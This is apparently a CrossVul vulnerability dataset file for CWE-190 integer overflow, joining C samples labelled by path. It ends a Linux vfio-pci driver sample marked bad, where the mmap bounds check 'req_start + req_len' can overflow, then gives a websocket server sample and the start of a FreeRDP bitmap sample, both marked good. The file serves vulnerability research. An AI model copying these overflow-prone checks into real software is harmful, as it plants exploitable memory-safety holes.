switch (index) {
case VFIO_PCI_CONFIG_REGION_INDEX:
return vfio_pci_config_rw(vdev, buf, count, ppos, iswrite);
case VFIO_PCI_ROM_REGION_INDEX:
if (iswrite)
return -EINVAL;
return vfio_pci_bar_rw(vdev, buf, count, ppos, false);
case VFIO_PCI_BAR0_REGION_INDEX ... VFIO_PCI_BAR5_REGION_INDEX:
return vfio_pci_bar_rw(vdev, buf, count, ppos, iswrite);
case VFIO_PCI_VGA_REGION_INDEX:
return vfio_pci_vga_rw(vdev, buf, count, ppos, iswrite);
default:
index -= VFIO_PCI_NUM_REGIONS;
return vdev->region[index].ops->rw(vdev, buf,
count, ppos, iswrite);
}
return -EINVAL;
}
static ssize_t vfio_pci_read(void *device_data, char __user *buf,
size_t count, loff_t *ppos)
{
if (!count)
return 0;
return vfio_pci_rw(device_data, buf, count, ppos, false);
}
static ssize_t vfio_pci_write(void *device_data, const char __user *buf,
size_t count, loff_t *ppos)
{
if (!count)
return 0;
return vfio_pci_rw(device_data, (char __user *)buf, count, ppos, true);
}
static int vfio_pci_mmap(void *device_data, struct vm_area_struct *vma)
{
struct vfio_pci_device *vdev = device_data;
struct pci_dev *pdev = vdev->pdev;
unsigned int index;
u64 phys_len, req_len, pgoff, req_start;
int ret;
index = vma->vm_pgoff >> (VFIO_PCI_OFFSET_SHIFT - PAGE_SHIFT);
if (vma->vm_end < vma->vm_start)
return -EINVAL;
if ((vma->vm_flags & VM_SHARED) == 0)
return -EINVAL;
if (index >= VFIO_PCI_ROM_REGION_INDEX)
return -EINVAL;
if (!vdev->bar_mmap_supported[index])
return -EINVAL;
phys_len = PAGE_ALIGN(pci_resource_len(pdev, index));
req_len = vma->vm_end - vma->vm_start;
pgoff = vma->vm_pgoff &
((1U << (VFIO_PCI_OFFSET_SHIFT - PAGE_SHIFT)) - 1);
req_start = pgoff << PAGE_SHIFT;
if (req_start + req_len > phys_len)
return -EINVAL;
if (index == vdev->msix_bar) {
/*
* Disallow mmaps overlapping the MSI-X table; users don't
* get to touch this directly. We could find somewhere
* else to map the overlap, but page granularity is only
* a recommendation, not a requirement, so the user needs
* to know which bits are real. Requiring them to mmap
* around the table makes that clear.
*/
/* If neither entirely above nor below, then it overlaps */
if (!(req_start >= vdev->msix_offset + vdev->msix_size ||
req_start + req_len <= vdev->msix_offset))
return -EINVAL;
}
/*
* Even though we don't make use of the barmap for the mmap,
* we need to request the region and the barmap tracks that.
*/
if (!vdev->barmap[index]) {
ret = pci_request_selected_regions(pdev,
1 << index, "vfio-pci");
if (ret)
return ret;
vdev->barmap[index] = pci_iomap(pdev, index, 0);
}
vma->vm_private_data = vdev;
vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
vma->vm_pgoff = (pci_resource_start(pdev, index) >> PAGE_SHIFT) + pgoff;
return remap_pfn_range(vma, vma->vm_start, vma->vm_pgoff,
req_len, vma->vm_page_prot);
}
static void vfio_pci_request(void *device_data, unsigned int count)
{
struct vfio_pci_device *vdev = device_data;
mutex_lock(&vdev->igate);
if (vdev->req_trigger) {
if (!(count % 10))
dev_notice_ratelimited(&vdev->pdev->dev,
"Relaying device request to user (#%u)\n",
count);
eventfd_signal(vdev->req_trigger, 1);
} else if (count == 0) {
dev_warn(&vdev->pdev->dev,
"No device request channel registered, blocked until released by user\n");
}
mutex_unlock(&vdev->igate);
}
static const struct vfio_device_ops vfio_pci_ops = {
.name = "vfio-pci",
.open = vfio_pci_open,
.release = vfio_pci_release,
.ioctl = vfio_pci_ioctl,
.read = vfio_pci_read,
.write = vfio_pci_write,
.mmap = vfio_pci_mmap,
.request = vfio_pci_request,
};
static int vfio_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
{
struct vfio_pci_device *vdev;
struct iommu_group *group;
int ret;
if (pdev->hdr_type != PCI_HEADER_TYPE_NORMAL)
return -EINVAL;
group = vfio_iommu_group_get(&pdev->dev);
if (!group)
return -EINVAL;
vdev = kzalloc(sizeof(*vdev), GFP_KERNEL);
if (!vdev) {
vfio_iommu_group_put(group, &pdev->dev);
return -ENOMEM;
}
vdev->pdev = pdev;
vdev->irq_type = VFIO_PCI_NUM_IRQS;
mutex_init(&vdev->igate);
spin_lock_init(&vdev->irqlock);
ret = vfio_add_group_dev(&pdev->dev, &vfio_pci_ops, vdev);
if (ret) {
vfio_iommu_group_put(group, &pdev->dev);
kfree(vdev);
return ret;
}
if (vfio_pci_is_vga(pdev)) {
vga_client_register(pdev, vdev, NULL, vfio_pci_set_vga_decode);
vga_set_legacy_decoding(pdev,
vfio_pci_set_vga_decode(vdev, false));
}
if (!disable_idle_d3) {
/*
* pci-core sets the device power state to an unknown value at
* bootup and after being removed from a driver. The only
* transition it allows from this unknown state is to D0, which
* typically happens when a driver calls pci_enable_device().
* We're not ready to enable the device yet, but we do want to
* be able to get to D3. Therefore first do a D0 transition
* before going to D3.
*/
pci_set_power_state(pdev, PCI_D0);
pci_set_power_state(pdev, PCI_D3hot);
}
return ret;
}
static void vfio_pci_remove(struct pci_dev *pdev)
{
struct vfio_pci_device *vdev;
vdev = vfio_del_group_dev(&pdev->dev);
if (!vdev)
return;
vfio_iommu_group_put(pdev->dev.iommu_group, &pdev->dev);
kfree(vdev->region);
kfree(vdev);
if (vfio_pci_is_vga(pdev)) {
vga_client_register(pdev, NULL, NULL, NULL);
vga_set_legacy_decoding(pdev,
VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM |
VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM);
}
if (!disable_idle_d3)
pci_set_power_state(pdev, PCI_D0);
}
static pci_ers_result_t vfio_pci_aer_err_detected(struct pci_dev *pdev,
pci_channel_state_t state)
{
struct vfio_pci_device *vdev;
struct vfio_device *device;
device = vfio_device_get_from_dev(&pdev->dev);
if (device == NULL)
return PCI_ERS_RESULT_DISCONNECT;
vdev = vfio_device_data(device);
if (vdev == NULL) {
vfio_device_put(device);
return PCI_ERS_RESULT_DISCONNECT;
}
mutex_lock(&vdev->igate);
if (vdev->err_trigger)
eventfd_signal(vdev->err_trigger, 1);
mutex_unlock(&vdev->igate);
vfio_device_put(device);
return PCI_ERS_RESULT_CAN_RECOVER;
}
static const struct pci_error_handlers vfio_err_handlers = {
.error_detected = vfio_pci_aer_err_detected,
};
static struct pci_driver vfio_pci_driver = {
.name = "vfio-pci",
.id_table = NULL, /* only dynamic ids */
.probe = vfio_pci_probe,
.remove = vfio_pci_remove,
.err_handler = &vfio_err_handlers,
};
struct vfio_devices {
struct vfio_device **devices;
int cur_index;
int max_index;
};
static int vfio_pci_get_devs(struct pci_dev *pdev, void *data)
{
struct vfio_devices *devs = data;
struct vfio_device *device;
if (devs->cur_index == devs->max_index)
return -ENOSPC;
device = vfio_device_get_from_dev(&pdev->dev);
if (!device)
return -EINVAL;
if (pci_dev_driver(pdev) != &vfio_pci_driver) {
vfio_device_put(device);
return -EBUSY;
}
devs->devices[devs->cur_index++] = device;
return 0;
}
/*
* Attempt to do a bus/slot reset if there are devices affected by a reset for
* this device that are needs_reset and all of the affected devices are unused
* (!refcnt). Callers are required to hold driver_lock when calling this to
* prevent device opens and concurrent bus reset attempts. We prevent device
* unbinds by acquiring and holding a reference to the vfio_device.
*
* NB: vfio-core considers a group to be viable even if some devices are
* bound to drivers like pci-stub or pcieport. Here we require all devices
* to be bound to vfio_pci since that's the only way we can be sure they
* stay put.
*/
static void vfio_pci_try_bus_reset(struct vfio_pci_device *vdev)
{
struct vfio_devices devs = { .cur_index = 0 };
int i = 0, ret = -EINVAL;
bool needs_reset = false, slot = false;
struct vfio_pci_device *tmp;
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return;
if (vfio_pci_for_each_slot_or_bus(vdev->pdev, vfio_pci_count_devs,
&i, slot) || !i)
return;
devs.max_index = i;
devs.devices = kcalloc(i, sizeof(struct vfio_device *), GFP_KERNEL);
if (!devs.devices)
return;
if (vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_get_devs, &devs, slot))
goto put_devs;
for (i = 0; i < devs.cur_index; i++) {
tmp = vfio_device_data(devs.devices[i]);
if (tmp->needs_reset)
needs_reset = true;
if (tmp->refcnt)
goto put_devs;
}
if (needs_reset)
ret = slot ? pci_try_reset_slot(vdev->pdev->slot) :
pci_try_reset_bus(vdev->pdev->bus);
put_devs:
for (i = 0; i < devs.cur_index; i++) {
tmp = vfio_device_data(devs.devices[i]);
if (!ret)
tmp->needs_reset = false;
if (!tmp->refcnt && !disable_idle_d3)
pci_set_power_state(tmp->pdev, PCI_D3hot);
vfio_device_put(devs.devices[i]);
}
kfree(devs.devices);
}
static void __exit vfio_pci_cleanup(void)
{
pci_unregister_driver(&vfio_pci_driver);
vfio_pci_uninit_perm_bits();
}
static void __init vfio_pci_fill_ids(void)
{
char *p, *id;
int rc;
/* no ids passed actually */
if (ids[0] == '\0')
return;
/* add ids specified in the module parameter */
p = ids;
while ((id = strsep(&p, ","))) {
unsigned int vendor, device, subvendor = PCI_ANY_ID,
subdevice = PCI_ANY_ID, class = 0, class_mask = 0;
int fields;
if (!strlen(id))
continue;
fields = sscanf(id, "%x:%x:%x:%x:%x:%x",
&vendor, &device, &subvendor, &subdevice,
&class, &class_mask);
if (fields < 2) {
pr_warn("invalid id string \"%s\"\n", id);
continue;
}
rc = pci_add_dynid(&vfio_pci_driver, vendor, device,
subvendor, subdevice, class, class_mask, 0);
if (rc)
pr_warn("failed to add dynamic id [%04hx:%04hx[%04hx:%04hx]] class %#08x/%08x (%d)\n",
vendor, device, subvendor, subdevice,
class, class_mask, rc);
else
pr_info("add [%04hx:%04hx[%04hx:%04hx]] class %#08x/%08x\n",
vendor, device, subvendor, subdevice,
class, class_mask);
}
}
static int __init vfio_pci_init(void)
{
int ret;
/* Allocate shared config space permision data used by all devices */
ret = vfio_pci_init_perm_bits();
if (ret)
return ret;
/* Register and scan for devices */
ret = pci_register_driver(&vfio_pci_driver);
if (ret)
goto out_driver;
vfio_pci_fill_ids();
return 0;
out_driver:
vfio_pci_uninit_perm_bits();
return ret;
}
module_init(vfio_pci_init);
module_exit(vfio_pci_cleanup);
MODULE_VERSION(DRIVER_VERSION);
MODULE_LICENSE("GPL v2");
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_DESCRIPTION(DRIVER_DESC);
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5375_0 |
crossvul-cpp_data_good_401_3 | /*
* Description:
* History: yang@haipo.me, 2017/04/26, create
*/
# include <stdbool.h>
# include <openssl/sha.h>
# include "ut_log.h"
# include "ut_misc.h"
# include "ut_base64.h"
# include "ut_ws_svr.h"
struct ws_frame {
uint8_t fin;
uint8_t opcode;
uint64_t payload_len;
void *payload;
};
struct clt_info {
nw_ses *ses;
void *privdata;
double last_activity;
struct http_parser parser;
sds field;
bool field_set;
sds value;
bool value_set;
bool upgrade;
sds remote;
sds url;
sds message;
http_request_t *request;
struct ws_frame frame;
};
static int on_http_message_begin(http_parser* parser)
{
struct clt_info *info = parser->data;
if (info->request)
http_request_release(info->request);
info->request = http_request_new();
if (info->request == NULL) {
return -__LINE__;
}
return 0;
}
static int send_hand_shake_reply(nw_ses *ses, char *protocol, const char *key)
{
unsigned char hash[20];
sds data = sdsnew(key);
data = sdscat(data, "258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
SHA1((const unsigned char *)data, sdslen(data), hash);
sdsfree(data);
sds b4message;
base64_encode(hash, sizeof(hash), &b4message);
http_response_t *response = http_response_new();
http_response_set_header(response, "Upgrade", "websocket");
http_response_set_header(response, "Connection", "Upgrade");
http_response_set_header(response, "Sec-WebSocket-Accept", b4message);
if (protocol) {
http_response_set_header(response, "Sec-WebSocket-Protocol", protocol);
}
response->status = 101;
sds message = http_response_encode(response);
nw_ses_send(ses, message, sdslen(message));
sdsfree(message);
sdsfree(b4message);
return 0;
}
static bool is_good_protocol(const char *protocol_list, const char *protocol)
{
char *tmp = strdup(protocol_list);
char *pch = strtok(tmp, ", ");
while (pch != NULL) {
if (strcmp(pch, protocol) == 0) {
free(tmp);
return true;
}
pch = strtok(NULL, ", ");
}
free(tmp);
return false;
}
static bool is_good_origin(const char *origin, const char *require)
{
size_t origin_len = strlen(origin);
size_t require_len = strlen(require);
if (origin_len < require_len)
return false;
if (memcmp(origin + (origin_len - require_len), require, require_len) != 0)
return false;
return true;
}
static int on_http_message_complete(http_parser* parser)
{
struct clt_info *info = parser->data;
ws_svr *svr = ws_svr_from_ses(info->ses);
info->request->version_major = parser->http_major;
info->request->version_minor = parser->http_minor;
info->request->method = parser->method;
dict_entry *entry;
dict_iterator *iter = dict_get_iterator(info->request->headers);
while ((entry = dict_next(iter)) != NULL) {
log_trace("Header: %s: %s", (char *)entry->key, (char *)entry->val);
}
dict_release_iterator(iter);
if (info->request->method != HTTP_GET)
goto error;
if (http_request_get_header(info->request, "Host") == NULL)
goto error;
double version = info->request->version_major + info->request->version_minor * 0.1;
if (version < 1.1)
goto error;
const char *upgrade = http_request_get_header(info->request, "Upgrade");
if (upgrade == NULL || strcasecmp(upgrade, "websocket") != 0)
goto error;
const char *connection = http_request_get_header(info->request, "Connection");
if (connection == NULL || strlen(connection) > UT_WS_SVR_MAX_HEADER_SIZE)
goto error;
else {
bool found_upgrade = false;
int count;
sds *tokens = sdssplitlen(connection, strlen(connection), ",", 1, &count);
if (tokens == NULL)
goto error;
for (int i = 0; i < count; i++) {
sds token = tokens[i];
sdstrim(token, " ");
if (strcasecmp(token, "Upgrade") == 0) {
found_upgrade = true;
break;
}
}
sdsfreesplitres(tokens, count);
if (!found_upgrade)
goto error;
}
const char *ws_version = http_request_get_header(info->request, "Sec-WebSocket-Version");
if (ws_version == NULL || strcmp(ws_version, "13") != 0)
goto error;
const char *ws_key = http_request_get_header(info->request, "Sec-WebSocket-Key");
if (ws_key == NULL)
goto error;
const char *protocol_list = http_request_get_header(info->request, "Sec-WebSocket-Protocol");
if (protocol_list && !is_good_protocol(protocol_list, svr->protocol))
goto error;
if (strlen(svr->origin) > 0) {
const char *origin = http_request_get_header(info->request, "Origin");
if (origin == NULL || !is_good_origin(origin, svr->origin))
goto error;
}
if (svr->type.on_privdata_alloc) {
info->privdata = svr->type.on_privdata_alloc(svr);
if (info->privdata == NULL)
goto error;
}
info->upgrade = true;
info->remote = sdsnew(http_get_remote_ip(info->ses, info->request));
info->url = sdsnew(info->request->url);
if (svr->type.on_upgrade) {
svr->type.on_upgrade(info->ses, info->remote);
}
if (protocol_list) {
send_hand_shake_reply(info->ses, svr->protocol, ws_key);
} else {
send_hand_shake_reply(info->ses, NULL, ws_key);
}
return 0;
error:
ws_svr_close_clt(ws_svr_from_ses(info->ses), info->ses);
return -1;
}
static int on_http_url(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
if (info->request->url)
sdsfree(info->request->url);
info->request->url = sdsnewlen(at, length);
return 0;
}
static int on_http_header_field(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->field_set = true;
if (info->field == NULL) {
info->field = sdsnewlen(at, length);
} else {
info->field = sdscpylen(info->field, at, length);
}
return 0;
}
static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
static int on_http_body(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->request->body = sdsnewlen(at, length);
return 0;
}
static bool is_good_opcode(uint8_t opcode)
{
static uint8_t good_list[] = { 0x0, 0x1, 0x2, 0x8, 0x9, 0xa };
for (size_t i = 0; i < sizeof(good_list); ++i) {
if (opcode == good_list[i])
return true;
}
return false;
}
static int decode_pkg(nw_ses *ses, void *data, size_t max)
{
struct clt_info *info = ses->privdata;
if (!info->upgrade) {
return max;
}
if (max < 2)
return 0;
uint8_t *p = data;
size_t pkg_size = 0;
memset(&info->frame, 0, sizeof(info->frame));
info->frame.fin = p[0] & 0x80;
info->frame.opcode = p[0] & 0x0f;
if (!is_good_opcode(info->frame.opcode))
return -1;
uint8_t mask = p[1] & 0x80;
if (mask == 0)
return -1;
uint8_t len = p[1] & 0x7f;
if (len < 126) {
pkg_size = 2;
info->frame.payload_len = len;
} else if (len == 126) {
pkg_size = 2 + 2;
if (max < pkg_size)
return 0;
info->frame.payload_len = be16toh(*(uint16_t *)(p + 2));
} else if (len == 127) {
pkg_size = 2 + 8;
if (max < pkg_size)
return 0;
info->frame.payload_len = be64toh(*(uint64_t *)(p + 2));
}
uint8_t masks[4];
memcpy(masks, p + pkg_size, sizeof(masks));
pkg_size += sizeof(masks);
info->frame.payload = p + pkg_size;
pkg_size += info->frame.payload_len;
if (max < pkg_size)
return 0;
p = info->frame.payload;
for (size_t i = 0; i < info->frame.payload_len; ++i) {
p[i] = p[i] ^ masks[i & 3];
}
return pkg_size;
}
static void on_error_msg(nw_ses *ses, const char *msg)
{
log_error("peer: %s: %s", nw_sock_human_addr(&ses->peer_addr), msg);
}
static void on_new_connection(nw_ses *ses)
{
log_trace("new connection from: %s", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
memset(info, 0, sizeof(struct clt_info));
info->ses = ses;
info->last_activity = current_timestamp();
http_parser_init(&info->parser, HTTP_REQUEST);
info->parser.data = info;
}
static void on_connection_close(nw_ses *ses)
{
log_trace("connection %s close", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
struct ws_svr *svr = ws_svr_from_ses(ses);
if (info->upgrade) {
if (svr->type.on_close) {
svr->type.on_close(ses, info->remote);
}
if (svr->type.on_privdata_free) {
svr->type.on_privdata_free(svr, info->privdata);
}
}
}
static void *on_privdata_alloc(void *svr)
{
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
return nw_cache_alloc(w_svr->privdata_cache);
}
static void on_privdata_free(void *svr, void *privdata)
{
struct clt_info *info = privdata;
if (info->field) {
sdsfree(info->field);
}
if (info->value) {
sdsfree(info->value);
}
if (info->remote) {
sdsfree(info->remote);
}
if (info->url) {
sdsfree(info->url);
}
if (info->message) {
sdsfree(info->message);
}
if (info->request) {
http_request_release(info->request);
}
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
nw_cache_free(w_svr->privdata_cache, privdata);
}
static int send_reply(nw_ses *ses, uint8_t opcode, void *payload, size_t payload_len)
{
if (payload == NULL)
payload_len = 0;
static void *buf;
static size_t buf_size = 1024;
if (buf == NULL) {
buf = malloc(1024);
if (buf == NULL)
return -1;
}
size_t require_len = 10 + payload_len;
if (buf_size < require_len) {
void *new = realloc(buf, require_len);
if (new == NULL)
return -1;
buf = new;
buf_size = require_len;
}
size_t pkg_len = 0;
uint8_t *p = buf;
p[0] = 0;
p[0] |= 0x1 << 7;
p[0] |= opcode;
p[1] = 0;
if (payload_len < 126) {
uint8_t len = payload_len;
p[1] |= len;
pkg_len = 2;
} else if (payload_len <= 0xffff) {
p[1] |= 126;
uint16_t len = htobe16((uint16_t)payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
} else {
p[1] |= 127;
uint64_t len = htobe64(payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
}
if (payload) {
memcpy(p + pkg_len, payload, payload_len);
pkg_len += payload_len;
}
return nw_ses_send(ses, buf, pkg_len);
}
static int send_pong_message(nw_ses *ses)
{
return send_reply(ses, 0xa, NULL, 0);
}
static void on_recv_pkg(nw_ses *ses, void *data, size_t size)
{
struct clt_info *info = ses->privdata;
ws_svr *svr = ws_svr_from_ses(ses);
info->last_activity = current_timestamp();
if (!info->upgrade) {
size_t nparsed = http_parser_execute(&info->parser, &svr->settings, data, size);
if (!info->parser.upgrade && nparsed != size) {
log_error("peer: %s http parse error: %s (%s)", nw_sock_human_addr(&ses->peer_addr),
http_errno_description(HTTP_PARSER_ERRNO(&info->parser)),
http_errno_name(HTTP_PARSER_ERRNO(&info->parser)));
nw_svr_close_clt(svr->raw_svr, ses);
}
return;
}
switch (info->frame.opcode) {
case 0x8:
nw_svr_close_clt(svr->raw_svr, ses);
return;
case 0x9:
send_pong_message(ses);
return;
case 0xa:
return;
}
if (info->message == NULL)
info->message = sdsempty();
info->message = sdscatlen(info->message, info->frame.payload, info->frame.payload_len);
if (info->frame.fin) {
int ret = svr->type.on_message(ses, info->remote, info->url, info->message, sdslen(info->message));
if (ses->id != 0) {
if (ret < 0) {
nw_svr_close_clt(svr->raw_svr, ses);
} else {
sdsfree(info->message);
info->message = NULL;
}
}
}
}
static void on_timer(nw_timer *timer, void *privdata)
{
ws_svr *svr = privdata;
double now = current_timestamp();
nw_ses *curr = svr->raw_svr->clt_list_head;
nw_ses *next;
while (curr) {
next = curr->next;
struct clt_info *info = curr->privdata;
if (now - info->last_activity > svr->keep_alive) {
log_error("peer: %s: last_activity: %f, idle too long", nw_sock_human_addr(&curr->peer_addr), info->last_activity);
nw_svr_close_clt(svr->raw_svr, curr);
}
curr = next;
}
}
ws_svr *ws_svr_create(ws_svr_cfg *cfg, ws_svr_type *type)
{
if (type->on_message == NULL)
return NULL;
if (type->on_privdata_alloc && !type->on_privdata_free)
return NULL;
ws_svr *svr = malloc(sizeof(ws_svr));
memset(svr, 0, sizeof(ws_svr));
nw_svr_cfg raw_cfg;
memset(&raw_cfg, 0, sizeof(raw_cfg));
raw_cfg.bind_count = cfg->bind_count;
raw_cfg.bind_arr = cfg->bind_arr;
raw_cfg.max_pkg_size = cfg->max_pkg_size;
raw_cfg.buf_limit = cfg->buf_limit;
raw_cfg.read_mem = cfg->read_mem;
raw_cfg.write_mem = cfg->write_mem;
nw_svr_type st;
memset(&st, 0, sizeof(st));
st.decode_pkg = decode_pkg;
st.on_error_msg = on_error_msg;
st.on_new_connection = on_new_connection;
st.on_connection_close = on_connection_close;
st.on_recv_pkg = on_recv_pkg;
st.on_privdata_alloc = on_privdata_alloc;
st.on_privdata_free = on_privdata_free;
svr->raw_svr = nw_svr_create(&raw_cfg, &st, svr);
if (svr->raw_svr == NULL) {
free(svr);
return NULL;
}
memset(&svr->settings, 0, sizeof(http_parser_settings));
svr->settings.on_message_begin = on_http_message_begin;
svr->settings.on_url = on_http_url;
svr->settings.on_header_field = on_http_header_field;
svr->settings.on_header_value = on_http_header_value;
svr->settings.on_body = on_http_body;
svr->settings.on_message_complete = on_http_message_complete;
svr->keep_alive = cfg->keep_alive;
svr->protocol = strdup(cfg->protocol);
svr->origin = strdup(cfg->origin);
svr->privdata_cache = nw_cache_create(sizeof(struct clt_info));
memcpy(&svr->type, type, sizeof(ws_svr_type));
if (cfg->keep_alive > 0) {
nw_timer_set(&svr->timer, 60, true, on_timer, svr);
nw_timer_start(&svr->timer);
}
return svr;
}
int ws_svr_start(ws_svr *svr)
{
int ret = nw_svr_start(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
int ws_svr_stop(ws_svr *svr)
{
int ret = nw_svr_stop(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
ws_svr *ws_svr_from_ses(nw_ses *ses)
{
return ((nw_svr *)ses->svr)->privdata;
}
void *ws_ses_privdata(nw_ses *ses)
{
struct clt_info *info = ses->privdata;
return info->privdata;
}
int ws_send_text(nw_ses *ses, char *message)
{
return send_reply(ses, 0x1, message, strlen(message));
}
int ws_send_binary(nw_ses *ses, void *data, size_t size)
{
return send_reply(ses, 0x2, data, size);
}
static int broadcast_message(ws_svr *svr, uint8_t opcode, void *data, size_t size)
{
nw_ses *curr = svr->raw_svr->clt_list_head;
while (curr) {
nw_ses *next = curr->next;
struct clt_info *info = curr->privdata;
if (info->upgrade) {
int ret = send_reply(curr, opcode, data, size);
if (ret < 0)
return ret;
}
curr = next;
}
return 0;
}
int ws_svr_broadcast_text(ws_svr *svr, char *message)
{
return broadcast_message(svr, 0x1, message, strlen(message));
}
int ws_svr_broadcast_binary(ws_svr *svr, void *data, size_t size)
{
return broadcast_message(svr, 0x2, data, size);
}
void ws_svr_close_clt(ws_svr *svr, nw_ses *ses)
{
nw_svr_close_clt(svr->raw_svr, ses);
}
void ws_svr_release(ws_svr *svr)
{
nw_svr_release(svr->raw_svr);
nw_timer_stop(&svr->timer);
nw_cache_release(svr->privdata_cache);
free(svr->protocol);
free(svr);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_401_3 |
crossvul-cpp_data_good_673_0 | /**
* FreeRDP: A Remote Desktop Protocol Implementation
* Graphical Objects
*
* Copyright 2011 Marc-Andre Moreau <marcandre.moreau@gmail.com>
* Copyright 2016 Armin Novak <armin.novak@thincast.com>
* Copyright 2016 Thincast Technologies GmbH
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include <winpr/crt.h>
#include <freerdp/log.h>
#include <freerdp/gdi/dc.h>
#include <freerdp/gdi/shape.h>
#include <freerdp/gdi/region.h>
#include <freerdp/gdi/bitmap.h>
#include "clipping.h"
#include "drawing.h"
#include "brush.h"
#include "graphics.h"
#define TAG FREERDP_TAG("gdi")
/* Bitmap Class */
HGDI_BITMAP gdi_create_bitmap(rdpGdi* gdi, UINT32 nWidth, UINT32 nHeight,
UINT32 SrcFormat, BYTE* data)
{
UINT32 nSrcStep;
UINT32 nDstStep;
BYTE* pSrcData;
BYTE* pDstData;
HGDI_BITMAP bitmap;
if (!gdi)
return NULL;
nDstStep = nWidth * GetBytesPerPixel(gdi->dstFormat);
pDstData = _aligned_malloc(nHeight * nDstStep, 16);
if (!pDstData)
return NULL;
pSrcData = data;
nSrcStep = nWidth * GetBytesPerPixel(SrcFormat);
if (!freerdp_image_copy(pDstData, gdi->dstFormat, nDstStep, 0, 0,
nWidth, nHeight, pSrcData, SrcFormat, nSrcStep, 0, 0,
&gdi->palette, FREERDP_FLIP_NONE))
{
_aligned_free(pDstData);
return NULL;
}
bitmap = gdi_CreateBitmap(nWidth, nHeight, gdi->dstFormat, pDstData);
return bitmap;
}
static BOOL gdi_Bitmap_New(rdpContext* context, rdpBitmap* bitmap)
{
gdiBitmap* gdi_bitmap;
rdpGdi* gdi = context->gdi;
gdi_bitmap = (gdiBitmap*) bitmap;
gdi_bitmap->hdc = gdi_CreateCompatibleDC(gdi->hdc);
if (!gdi_bitmap->hdc)
return FALSE;
if (!bitmap->data)
gdi_bitmap->bitmap = gdi_CreateCompatibleBitmap(
gdi->hdc, bitmap->width,
bitmap->height);
else
{
UINT32 format = bitmap->format;
gdi_bitmap->bitmap = gdi_create_bitmap(gdi, bitmap->width,
bitmap->height,
format, bitmap->data);
}
if (!gdi_bitmap->bitmap)
{
gdi_DeleteDC(gdi_bitmap->hdc);
return FALSE;
}
gdi_bitmap->hdc->format = gdi_bitmap->bitmap->format;
gdi_SelectObject(gdi_bitmap->hdc, (HGDIOBJECT) gdi_bitmap->bitmap);
gdi_bitmap->org_bitmap = NULL;
return TRUE;
}
static void gdi_Bitmap_Free(rdpContext* context, rdpBitmap* bitmap)
{
gdiBitmap* gdi_bitmap = (gdiBitmap*) bitmap;
if (gdi_bitmap)
{
if (gdi_bitmap->hdc)
gdi_SelectObject(gdi_bitmap->hdc, (HGDIOBJECT) gdi_bitmap->org_bitmap);
gdi_DeleteObject((HGDIOBJECT) gdi_bitmap->bitmap);
gdi_DeleteDC(gdi_bitmap->hdc);
_aligned_free(bitmap->data);
}
free(bitmap);
}
static BOOL gdi_Bitmap_Paint(rdpContext* context, rdpBitmap* bitmap)
{
gdiBitmap* gdi_bitmap = (gdiBitmap*) bitmap;
UINT32 width = bitmap->right - bitmap->left + 1;
UINT32 height = bitmap->bottom - bitmap->top + 1;
return gdi_BitBlt(context->gdi->primary->hdc,
bitmap->left, bitmap->top,
width, height, gdi_bitmap->hdc,
0, 0, GDI_SRCCOPY, &context->gdi->palette);
}
static BOOL gdi_Bitmap_Decompress(rdpContext* context, rdpBitmap* bitmap,
const BYTE* pSrcData, UINT32 DstWidth, UINT32 DstHeight,
UINT32 bpp, UINT32 length, BOOL compressed,
UINT32 codecId)
{
UINT32 SrcSize = length;
rdpGdi* gdi = context->gdi;
UINT32 size = DstWidth * DstHeight;
bitmap->compressed = FALSE;
bitmap->format = gdi->dstFormat;
if ((GetBytesPerPixel(bitmap->format) == 0) ||
(DstWidth == 0) || (DstHeight == 0) || (DstWidth > UINT32_MAX / DstHeight) ||
(size > (UINT32_MAX / GetBytesPerPixel(bitmap->format))))
return FALSE;
size *= GetBytesPerPixel(bitmap->format);
bitmap->length = size;
bitmap->data = (BYTE*) _aligned_malloc(bitmap->length, 16);
if (!bitmap->data)
return FALSE;
if (compressed)
{
if (bpp < 32)
{
if (!interleaved_decompress(context->codecs->interleaved,
pSrcData, SrcSize,
DstWidth, DstHeight,
bpp,
bitmap->data, bitmap->format,
0, 0, 0, DstWidth, DstHeight,
&gdi->palette))
return FALSE;
}
else
{
if (!planar_decompress(context->codecs->planar, pSrcData, SrcSize,
DstWidth, DstHeight,
bitmap->data, bitmap->format, 0, 0, 0,
DstWidth, DstHeight, TRUE))
return FALSE;
}
}
else
{
const UINT32 SrcFormat = gdi_get_pixel_format(bpp);
const size_t sbpp = GetBytesPerPixel(SrcFormat);
